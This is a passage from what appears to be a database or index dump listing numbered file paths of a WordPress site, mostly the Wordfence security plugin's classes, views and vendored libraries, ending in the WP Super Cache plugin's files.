(3352, 'wp-content/plugins/wordfence/modules/login-security/classes/model/notice.php'),
(3353, 'wp-content/plugins/wordfence/modules/login-security/classes/model/request.php'),
(3354, 'wp-content/plugins/wordfence/modules/login-security/classes/model/settings/db.php'),
(3355, 'wp-content/plugins/wordfence/modules/login-security/classes/model/settings/wpoptions.php'),
(3356, 'wp-content/plugins/wordfence/modules/login-security/classes/model/settings.php'),
(3357, 'wp-content/plugins/wordfence/modules/login-security/classes/model/text/html.php'),
(3358, 'wp-content/plugins/wordfence/modules/login-security/classes/model/text/javascript.php'),
(3359, 'wp-content/plugins/wordfence/modules/login-security/classes/model/tokenbucket.php'),
(3360, 'wp-content/plugins/wordfence/modules/login-security/classes/model/view/tab.php'),
(3361, 'wp-content/plugins/wordfence/modules/login-security/classes/model/view/title.php'),
(3362, 'wp-content/plugins/wordfence/modules/login-security/classes/model/view.php'),
(3363, 'wp-content/plugins/wordfence/modules/login-security/css/admin-global.1579191227.css'),
(3364, 'wp-content/plugins/wordfence/modules/login-security/css/admin.1579191227.css'),
(3365, 'wp-content/plugins/wordfence/modules/login-security/css/colorbox.1579191227.css'),
(3366, 'wp-content/plugins/wordfence/modules/login-security/css/font-awesome.1579191227.css'),
(3367, 'wp-content/plugins/wordfence/modules/login-security/css/ionicons.1579191227.css'),
(3368, 'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui-timepicker-addon.1579191227.css'),
(3369, 'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.min.1579191227.css'),
(3370, 'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.structure.min.1579191227.css'),
(3371, 'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.theme.min.1579191227.css'),
(3372, 'wp-content/plugins/wordfence/modules/login-security/css/login.1579191227.css'),
(3373, 'wp-content/plugins/wordfence/modules/login-security/img/header.svg'),
(3374, 'wp-content/plugins/wordfence/modules/login-security/img/lightbox-controls.png'),
(3375, 'wp-content/plugins/wordfence/modules/login-security/img/loading.gif'),
(3376, 'wp-content/plugins/wordfence/modules/login-security/img/loading_background.png'),
(3377, 'wp-content/plugins/wordfence/modules/login-security/img/menu.svg'),
(3378, 'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_444444_256x240.png'),
(3379, 'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_555555_256x240.png'),
(3380, 'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777620_256x240.png'),
(3381, 'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777777_256x240.png'),
(3382, 'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_cc0000_256x240.png'),
(3383, 'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_ffffff_256x240.png'),
(3384, 'wp-content/plugins/wordfence/modules/login-security/js/admin-global.1579191227.js'),
(3385, 'wp-content/plugins/wordfence/modules/login-security/js/admin.1579191227.js'),
(3386, 'wp-content/plugins/wordfence/modules/login-security/js/jquery-ui-timepicker-addon.1579191227.js'),
(3387, 'wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.1579191227.js'),
(3388, 'wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.min.1579191227.js'),
(3389, 'wp-content/plugins/wordfence/modules/login-security/js/jquery.qrcode.min.1579191227.js'),
(3390, 'wp-content/plugins/wordfence/modules/login-security/js/jquery.tmpl.min.1579191227.js'),
(3391, 'wp-content/plugins/wordfence/modules/login-security/js/login.1579191227.js'),
(3392, 'wp-content/plugins/wordfence/modules/login-security/views/.htaccess'),
(3393, 'wp-content/plugins/wordfence/modules/login-security/views/common/modal-prompt.php'),
(3394, 'wp-content/plugins/wordfence/modules/login-security/views/email/login-verification.php'),
(3395, 'wp-content/plugins/wordfence/modules/login-security/views/manage/activate.php'),
(3396, 'wp-content/plugins/wordfence/modules/login-security/views/manage/code.php'),
(3397, 'wp-content/plugins/wordfence/modules/login-security/views/manage/deactivate.php'),
(3398, 'wp-content/plugins/wordfence/modules/login-security/views/manage/regenerate.php'),
(3399, 'wp-content/plugins/wordfence/modules/login-security/views/onboarding/standalone-header.php'),
(3400, 'wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha-threshold.php'),
(3401, 'wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha.php'),
(3402, 'wp-content/plugins/wordfence/modules/login-security/views/options/option-ip-source.php'),
(3403, 'wp-content/plugins/wordfence/modules/login-security/views/options/option-label.php'),
(3404, 'wp-content/plugins/wordfence/modules/login-security/views/options/option-require-2fa.php'),
(3405, 'wp-content/plugins/wordfence/modules/login-security/views/options/option-select.php'),
(3406, 'wp-content/plugins/wordfence/modules/login-security/views/options/option-switch.php'),
(3407, 'wp-content/plugins/wordfence/modules/login-security/views/options/option-text.php'),
(3408, 'wp-content/plugins/wordfence/modules/login-security/views/options/option-textarea.php'),
(3409, 'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-boolean-switch.php'),
(3410, 'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-multiple.php'),
(3411, 'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-segmented.php'),
(3412, 'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-select.php'),
(3413, 'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-sub.php'),
(3414, 'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-textarea.php'),
(3415, 'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled.php'),
(3416, 'wp-content/plugins/wordfence/modules/login-security/views/options/option-token.php'),
(3417, 'wp-content/plugins/wordfence/modules/login-security/views/page/manage.php'),
(3418, 'wp-content/plugins/wordfence/modules/login-security/views/page/page.php'),
(3419, 'wp-content/plugins/wordfence/modules/login-security/views/page/section-title.php'),
(3420, 'wp-content/plugins/wordfence/modules/login-security/views/page/settings.php'),
(3421, 'wp-content/plugins/wordfence/modules/login-security/views/page/tabbar.php'),
(3422, 'wp-content/plugins/wordfence/modules/login-security/views/settings/options.php'),
(3423, 'wp-content/plugins/wordfence/modules/login-security/views/settings/user-stats.php'),
(3424, 'wp-content/plugins/wordfence/modules/login-security/wordfence-login-security.php'),
(3425, 'wp-content/plugins/wordfence/readme.txt'),
(3426, 'wp-content/plugins/wordfence/tmp/.htaccess'),
(3427, 'wp-content/plugins/wordfence/vendor/.htaccess'),
(3428, 'wp-content/plugins/wordfence/vendor/autoload.php'),
(3429, 'wp-content/plugins/wordfence/vendor/composer/ClassLoader.php'),
(3430, 'wp-content/plugins/wordfence/vendor/composer/LICENSE'),
(3431, 'wp-content/plugins/wordfence/vendor/composer/autoload_classmap.php'),
(3432, 'wp-content/plugins/wordfence/vendor/composer/autoload_namespaces.php'),
(3433, 'wp-content/plugins/wordfence/vendor/composer/autoload_psr4.php'),
(3434, 'wp-content/plugins/wordfence/vendor/composer/autoload_real.php'),
(3435, 'wp-content/plugins/wordfence/vendor/composer/autoload_static.php'),
(3436, 'wp-content/plugins/wordfence/vendor/composer/ca-bundle/LICENSE'),
(3437, 'wp-content/plugins/wordfence/vendor/composer/ca-bundle/res/cacert.pem'),
(3438, 'wp-content/plugins/wordfence/vendor/composer/ca-bundle/src/CaBundle.php'),
(3439, 'wp-content/plugins/wordfence/vendor/composer/installed.json'),
(3440, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/.gitmodules'),
(3441, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/.php_cs'),
(3442, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/LICENSE'),
(3443, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Database/Reader.php'),
(3444, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AddressNotFoundException.php'),
(3445, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AuthenticationException.php'),
(3446, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/GeoIp2Exception.php'),
(3447, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/HttpException.php'),
(3448, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/InvalidRequestException.php'),
(3449, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/OutOfQueriesException.php'),
(3450, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AbstractModel.php'),
(3451, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AnonymousIp.php'),
(3452, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Asn.php'),
(3453, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/City.php'),
(3454, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/ConnectionType.php'),
(3455, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Country.php'),
(3456, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Domain.php'),
(3457, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Enterprise.php'),
(3458, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Insights.php'),
(3459, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Isp.php'),
(3460, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/ProviderInterface.php'),
(3461, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractPlaceRecord.php'),
(3462, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractRecord.php'),
(3463, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/City.php'),
(3464, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Continent.php'),
(3465, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Country.php'),
(3466, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Location.php'),
(3467, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/MaxMind.php'),
(3468, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Postal.php'),
(3469, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/RepresentedCountry.php'),
(3470, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Subdivision.php'),
(3471, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Traits.php'),
(3472, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/WebService/Client.php'),
(3473, 'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/LICENSE'),
(3474, 'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/AuthenticationException.php'),
(3475, 'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/HttpException.php'),
(3476, 'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InsufficientFundsException.php'),
(3477, 'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidInputException.php'),
(3478, 'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidRequestException.php'),
(3479, 'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/IpAddressNotFoundException.php'),
(3480, 'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/PermissionRequiredException.php'),
(3481, 'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/WebServiceException.php'),
(3482, 'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Client.php'),
(3483, 'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/CurlRequest.php'),
(3484, 'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/Request.php'),
(3485, 'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/RequestFactory.php'),
(3486, 'wp-content/plugins/wordfence/vendor/maxmind-db/reader/LICENSE'),
(3487, 'wp-content/plugins/wordfence/vendor/maxmind-db/reader/autoload.php'),
(3488, 'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Decoder.php'),
(3489, 'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/InvalidDatabaseException.php'),
(3490, 'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Metadata.php'),
(3491, 'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Util.php'),
(3492, 'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader.php'),
(3493, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/cacert.pem'),
(3494, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/falsepositive.key'),
(3495, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/init.php'),
(3496, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/config.php'),
(3497, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/http.php'),
(3498, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/json.php'),
(3499, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/lexer.php'),
(3500, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/parser.php'),
(3501, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/sqli.php'),
(3502, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/request.php'),
(3503, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/rules.php'),
(3504, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/file.php'),
(3505, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/mysql.php'),
(3506, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage.php'),
(3507, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/utils.php'),
(3508, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/view.php'),
(3509, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/waf.php'),
(3510, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/xmlrpc.php'),
(3511, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/rules.key'),
(3512, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-blacklist.php'),
(3513, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-roadblock.php'),
(3514, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403.php'),
(3515, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503-lockout.php'),
(3516, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503.php'),
(3517, 'wp-content/plugins/wordfence/views/.htaccess'),
(3518, 'wp-content/plugins/wordfence/views/blocking/block-list.php'),
(3519, 'wp-content/plugins/wordfence/views/blocking/blocking-create.php'),
(3520, 'wp-content/plugins/wordfence/views/blocking/blocking-status.php'),
(3521, 'wp-content/plugins/wordfence/views/blocking/country-block-map.php'),
(3522, 'wp-content/plugins/wordfence/views/blocking/country-modal.php'),
(3523, 'wp-content/plugins/wordfence/views/blocking/option-bypass-cookie.php'),
(3524, 'wp-content/plugins/wordfence/views/blocking/option-bypass-redirect.php'),
(3525, 'wp-content/plugins/wordfence/views/blocking/options-group-advanced-country.php'),
(3526, 'wp-content/plugins/wordfence/views/common/block-navigation-option.php'),
(3527, 'wp-content/plugins/wordfence/views/common/indeterminate-progress.php'),
(3528, 'wp-content/plugins/wordfence/views/common/license.php'),
(3529, 'wp-content/plugins/wordfence/views/common/modal-prompt.php'),
(3530, 'wp-content/plugins/wordfence/views/common/page-fixed-tabbar.php'),
(3531, 'wp-content/plugins/wordfence/views/common/page-help.php'),
(3532, 'wp-content/plugins/wordfence/views/common/page-tabbar.php'),
(3533, 'wp-content/plugins/wordfence/views/common/page-title.php'),
(3534, 'wp-content/plugins/wordfence/views/common/section-subtitle.php'),
(3535, 'wp-content/plugins/wordfence/views/common/section-title.php'),
(3536, 'wp-content/plugins/wordfence/views/common/status-circular.php'),
(3537, 'wp-content/plugins/wordfence/views/common/status-critical.php'),
(3538, 'wp-content/plugins/wordfence/views/common/status-detail.php'),
(3539, 'wp-content/plugins/wordfence/views/common/status-tooltip.php'),
(3540, 'wp-content/plugins/wordfence/views/common/status-warning.php'),
(3541, 'wp-content/plugins/wordfence/views/common/unsubscribe.php'),
(3542, 'wp-content/plugins/wordfence/views/dashboard/global-status.php'),
(3543, 'wp-content/plugins/wordfence/views/dashboard/option-howgetips.php'),
(3544, 'wp-content/plugins/wordfence/views/dashboard/options-group-alert.php'),
(3545, 'wp-content/plugins/wordfence/views/dashboard/options-group-dashboard.php'),
(3546, 'wp-content/plugins/wordfence/views/dashboard/options-group-email-summary.php'),
(3547, 'wp-content/plugins/wordfence/views/dashboard/options-group-general.php'),
(3548, 'wp-content/plugins/wordfence/views/dashboard/options-group-import.php'),
(3549, 'wp-content/plugins/wordfence/views/dashboard/options-group-license.php'),
(3550, 'wp-content/plugins/wordfence/views/dashboard/options-group-view-customization.php'),
(3551, 'wp-content/plugins/wordfence/views/dashboard/status-payment-expiring.php'),
(3552, 'wp-content/plugins/wordfence/views/dashboard/status-renewing.php'),
(3553, 'wp-content/plugins/wordfence/views/gdpr/banner.php'),
(3554, 'wp-content/plugins/wordfence/views/gdpr/disabled-overlay.php'),
(3555, 'wp-content/plugins/wordfence/views/onboarding/banner.php'),
(3556, 'wp-content/plugins/wordfence/views/onboarding/disabled-overlay.php'),
(3557, 'wp-content/plugins/wordfence/views/onboarding/fresh-install.php'),
(3558, 'wp-content/plugins/wordfence/views/onboarding/modal-final-attempt.php'),
(3559, 'wp-content/plugins/wordfence/views/onboarding/overlay.php'),
(3560, 'wp-content/plugins/wordfence/views/onboarding/plugin-header.php'),
(3561, 'wp-content/plugins/wordfence/views/onboarding/tour-overlay.php'),
(3562, 'wp-content/plugins/wordfence/views/options/block-all-options-controls.php'),
(3563, 'wp-content/plugins/wordfence/views/options/block-controls.php'),
(3564, 'wp-content/plugins/wordfence/views/options/option-label.php'),
(3565, 'wp-content/plugins/wordfence/views/options/option-select.php'),
(3566, 'wp-content/plugins/wordfence/views/options/option-switch.php'),
(3567, 'wp-content/plugins/wordfence/views/options/option-text.php'),
(3568, 'wp-content/plugins/wordfence/views/options/option-textarea.php'),
(3569, 'wp-content/plugins/wordfence/views/options/option-toggled-boolean-switch.php'),
(3570, 'wp-content/plugins/wordfence/views/options/option-toggled-multiple.php'),
(3571, 'wp-content/plugins/wordfence/views/options/option-toggled-segmented.php'),
(3572, 'wp-content/plugins/wordfence/views/options/option-toggled-select.php'),
(3573, 'wp-content/plugins/wordfence/views/options/option-toggled-sub.php'),
(3574, 'wp-content/plugins/wordfence/views/options/option-toggled-textarea.php'),
(3575, 'wp-content/plugins/wordfence/views/options/option-toggled.php'),
(3576, 'wp-content/plugins/wordfence/views/options/option-token.php'),
(3577, 'wp-content/plugins/wordfence/views/options/options-title.php'),
(3578, 'wp-content/plugins/wordfence/views/reports/activity-report-email-inline.php'),
(3579, 'wp-content/plugins/wordfence/views/reports/activity-report.php'),
(3580, 'wp-content/plugins/wordfence/views/scanner/issue-base.php'),
(3581, 'wp-content/plugins/wordfence/views/scanner/issue-checkGSB.php'),
(3582, 'wp-content/plugins/wordfence/views/scanner/issue-checkHowGetIPs.php'),
(3583, 'wp-content/plugins/wordfence/views/scanner/issue-checkSpamIP.php'),
(3584, 'wp-content/plugins/wordfence/views/scanner/issue-commentBadURL.php'),
(3585, 'wp-content/plugins/wordfence/views/scanner/issue-configReadable.php'),
(3586, 'wp-content/plugins/wordfence/views/scanner/issue-control-edit-comment.php'),
(3587, 'wp-content/plugins/wordfence/views/scanner/issue-control-edit-post.php'),
(3588, 'wp-content/plugins/wordfence/views/scanner/issue-control-edit-user.php'),
(3589, 'wp-content/plugins/wordfence/views/scanner/issue-control-hide-file.php'),
(3590, 'wp-content/plugins/wordfence/views/scanner/issue-control-ignore.php'),
(3591, 'wp-content/plugins/wordfence/views/scanner/issue-control-repair.php'),
(3592, 'wp-content/plugins/wordfence/views/scanner/issue-control-show-details.php'),
(3593, 'wp-content/plugins/wordfence/views/scanner/issue-coreUnknown.php'),
(3594, 'wp-content/plugins/wordfence/views/scanner/issue-database.php'),
(3595, 'wp-content/plugins/wordfence/views/scanner/issue-diskSpace.php'),
(3596, 'wp-content/plugins/wordfence/views/scanner/issue-easyPassword.php'),
(3597, 'wp-content/plugins/wordfence/views/scanner/issue-file.php'),
(3598, 'wp-content/plugins/wordfence/views/scanner/issue-geoipSupport.php'),
(3599, 'wp-content/plugins/wordfence/views/scanner/issue-knownfile.php'),
(3600, 'wp-content/plugins/wordfence/views/scanner/issue-optionBadURL.php'),
(3601, 'wp-content/plugins/wordfence/views/scanner/issue-postBadTitle.php'),
(3602, 'wp-content/plugins/wordfence/views/scanner/issue-postBadURL.php'),
(3603, 'wp-content/plugins/wordfence/views/scanner/issue-publiclyAccessible.php'),
(3604, 'wp-content/plugins/wordfence/views/scanner/issue-skippedPaths.php'),
(3605, 'wp-content/plugins/wordfence/views/scanner/issue-spamvertizeCheck.php'),
(3606, 'wp-content/plugins/wordfence/views/scanner/issue-suspiciousAdminUsers.php'),
(3607, 'wp-content/plugins/wordfence/views/scanner/issue-timelimit.php'),
(3608, 'wp-content/plugins/wordfence/views/scanner/issue-wafStatus.php'),
(3609, 'wp-content/plugins/wordfence/views/scanner/issue-wfPluginAbandoned.php'),
(3610, 'wp-content/plugins/wordfence/views/scanner/issue-wfPluginRemoved.php'),
(3611, 'wp-content/plugins/wordfence/views/scanner/issue-wfPluginUpgrade.php'),
(3612, 'wp-content/plugins/wordfence/views/scanner/issue-wfPluginVulnerable.php'),
(3613, 'wp-content/plugins/wordfence/views/scanner/issue-wfThemeUpgrade.php'),
(3614, 'wp-content/plugins/wordfence/views/scanner/issue-wfUpgrade.php'),
(3615, 'wp-content/plugins/wordfence/views/scanner/issue-wpscan_directoryList.php'),
(3616, 'wp-content/plugins/wordfence/views/scanner/issue-wpscan_fullPathDiscl.php'),
(3617, 'wp-content/plugins/wordfence/views/scanner/no-issues.php'),
(3618, 'wp-content/plugins/wordfence/views/scanner/option-scan-signatures.php'),
(3619, 'wp-content/plugins/wordfence/views/scanner/options-group-advanced.php'),
(3620, 'wp-content/plugins/wordfence/views/scanner/options-group-basic.php'),
(3621, 'wp-content/plugins/wordfence/views/scanner/options-group-general.php'),
(3622, 'wp-content/plugins/wordfence/views/scanner/options-group-performance.php'),
(3623, 'wp-content/plugins/wordfence/views/scanner/options-group-scan-schedule.php'),
(3624, 'wp-content/plugins/wordfence/views/scanner/scan-failed.php'),
(3625, 'wp-content/plugins/wordfence/views/scanner/scan-progress-detailed.php'),
(3626, 'wp-content/plugins/wordfence/views/scanner/scan-progress-element.php'),
(3627, 'wp-content/plugins/wordfence/views/scanner/scan-progress.php'),
(3628, 'wp-content/plugins/wordfence/views/scanner/scan-results.php'),
(3629, 'wp-content/plugins/wordfence/views/scanner/scan-scheduling.php'),
(3630, 'wp-content/plugins/wordfence/views/scanner/scan-starter.php'),
(3631, 'wp-content/plugins/wordfence/views/scanner/scan-type.php'),
(3632, 'wp-content/plugins/wordfence/views/scanner/scanner-status.php'),
(3633, 'wp-content/plugins/wordfence/views/scanner/site-cleaning-beta-sigs.php'),
(3634, 'wp-content/plugins/wordfence/views/scanner/site-cleaning-bottom.php'),
(3635, 'wp-content/plugins/wordfence/views/scanner/site-cleaning-high-sense.php'),
(3636, 'wp-content/plugins/wordfence/views/scanner/site-cleaning.php'),
(3637, 'wp-content/plugins/wordfence/views/tools/options-group-2fa.php'),
(3638, 'wp-content/plugins/wordfence/views/tools/options-group-live-traffic.php'),
(3639, 'wp-content/plugins/wordfence/views/tours/login-security.php'),
(3640, 'wp-content/plugins/wordfence/views/waf/debug.php'),
(3641, 'wp-content/plugins/wordfence/views/waf/firewall-status.php'),
(3642, 'wp-content/plugins/wordfence/views/waf/option-rate-limit.php'),
(3643, 'wp-content/plugins/wordfence/views/waf/option-rules.php'),
(3644, 'wp-content/plugins/wordfence/views/waf/option-whitelist.php'),
(3645, 'wp-content/plugins/wordfence/views/waf/options-group-advanced-firewall.php'),
(3646, 'wp-content/plugins/wordfence/views/waf/options-group-basic-firewall.php'),
(3647, 'wp-content/plugins/wordfence/views/waf/options-group-brute-force.php'),
(3648, 'wp-content/plugins/wordfence/views/waf/options-group-rate-limiting.php'),
(3649, 'wp-content/plugins/wordfence/views/waf/options-group-whitelisted.php'),
(3650, 'wp-content/plugins/wordfence/views/waf/status-tooltip-learning-mode.php'),
(3651, 'wp-content/plugins/wordfence/views/waf/waf-install-manual.php'),
(3652, 'wp-content/plugins/wordfence/views/waf/waf-install-success.php'),
(3653, 'wp-content/plugins/wordfence/views/waf/waf-install.php'),
(3654, 'wp-content/plugins/wordfence/views/waf/waf-modal-wrapper.php'),
(3655, 'wp-content/plugins/wordfence/views/waf/waf-uninstall-success.php'),
(3656, 'wp-content/plugins/wordfence/views/waf/waf-uninstall.php'),
(3657, 'wp-content/plugins/wordfence/waf/.htaccess'),
(3658, 'wp-content/plugins/wordfence/waf/bootstrap.php'),
(3659, 'wp-content/plugins/wordfence/waf/wfWAFGeoIP2.php'),
(3660, 'wp-content/plugins/wordfence/waf/wfWAFIPBlocksController.php'),
(3661, 'wp-content/plugins/wordfence/waf/wfWAFUserIPRange.php'),
(3662, 'wp-content/plugins/wordfence/wordfence.php'),
(3663, 'wp-content/plugins/wp-super-cache/advanced-cache.php'),
(3664, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-be_BY.mo'),
(3665, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-be_BY.po'),
(3666, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-de_DE.mo'),
(3667, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-de_DE.po'),
(3668, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-es_ES.mo'),
(3669, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-es_ES.po'),
(3670, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-fr_FR.mo'),
(3671, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-fr_FR.po'),
(3672, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-it_IT.mo'),
(3673, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-it_IT.po'),
(3674, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-ja.mo'),
(3675, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-ja.po'),
(3676, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-lt_LT.mo'),
(3677, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-lt_LT.po'),
(3678, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-ro_RO.mo'),
(3679, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-ro_RO.po'),
(3680, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-ru_RU.mo'),
(3681, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-ru_RU.po'),
(3682, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-sr_RS.mo'),
(3683, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-sr_RS.po'),
(3684, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-sv_SE.mo'),
(3685, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-sv_SE.po'),
(3686, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-tr_TR.mo'),
(3687, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-tr_TR.po'),
(3688, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-ua_UA.mo'),
(3689, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-ua_UA.po'),
(3690, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-uk.mo'),
(3691, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-uk.po'),
(3692, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-zh_CN.mo'),
(3693, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-zh_CN.po'),
(3694, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-zh_TW.mo'),
(3695, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-zh_TW.po'),
(3696, 'wp-content/plugins/wp-super-cache/ossdl-cdn.php'),
(3697, 'wp-content/plugins/wp-super-cache/plugins/awaitingmoderation.php'),
(3698, 'wp-content/plugins/wp-super-cache/plugins/badbehaviour.php'),
(3699, 'wp-content/plugins/wp-super-cache/plugins/domain-mapping.php'),
(3700, 'wp-content/plugins/wp-super-cache/plugins/dynamic-cache-test.php'),
(3701, 'wp-content/plugins/wp-super-cache/plugins/jetpack.php'),
(3702, 'wp-content/plugins/wp-super-cache/plugins/multisite.php'),
(3703, 'wp-content/plugins/wp-super-cache/plugins/wptouch.php'),
(3704, 'wp-content/plugins/wp-super-cache/readme.txt'),
(3705, 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-delete-cache.php'),
(3706, 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-get-cache.php'),
(3707, 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-get-plugins.php'),
(3708, 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-get-settings.php'),
(3709, 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-get-stats.php'),
(3710, 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-get-status.php'),
